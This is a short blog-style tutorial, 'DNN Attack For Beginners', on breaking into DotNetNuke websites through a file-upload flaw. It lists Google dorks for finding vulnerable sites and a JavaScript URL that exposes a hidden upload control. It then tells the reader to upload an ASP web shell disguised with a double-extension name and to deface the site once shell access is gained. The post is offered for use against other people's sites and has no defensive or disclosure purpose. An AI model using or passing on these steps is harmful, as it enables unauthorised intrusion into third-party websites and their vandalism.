GuidePedia

0

DNN Attack For Beginners By AA Team

DNNbanner-TrixsMaxter
DNNbanner-TrixsMaxter

What Is DNN ?

DNN stands for Dot Net Nuke. It have an remote arbitrary File Upload vulnerability. simply said iploading
vulnerrability.

Finding vulnerable websites
Find vulnerable websites by GOOGLE dorks :
inurl:/fck/fcklinkgallery.aspx
inurl:/tabid/36/language/en-US/Default.aspx

I got a target

TrixsMaxter

Select "File" from list.
The in url bar paste the javascript ;
javascript:__doPostBack('ctlURL$cmdUpload','')
Now there appear a uploading bar on page. As seen be below :

TrixsMaxter

Now upload your ASP shell as "shell.asp;.txt , shell.asp;.jpg"
your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt"
TrixsMaxter

Now  you have a Shell Access to the website . Now deface the website.
Hope You Enjoy....!

Post a Comment

Thanks For Your Feed Back

 
Top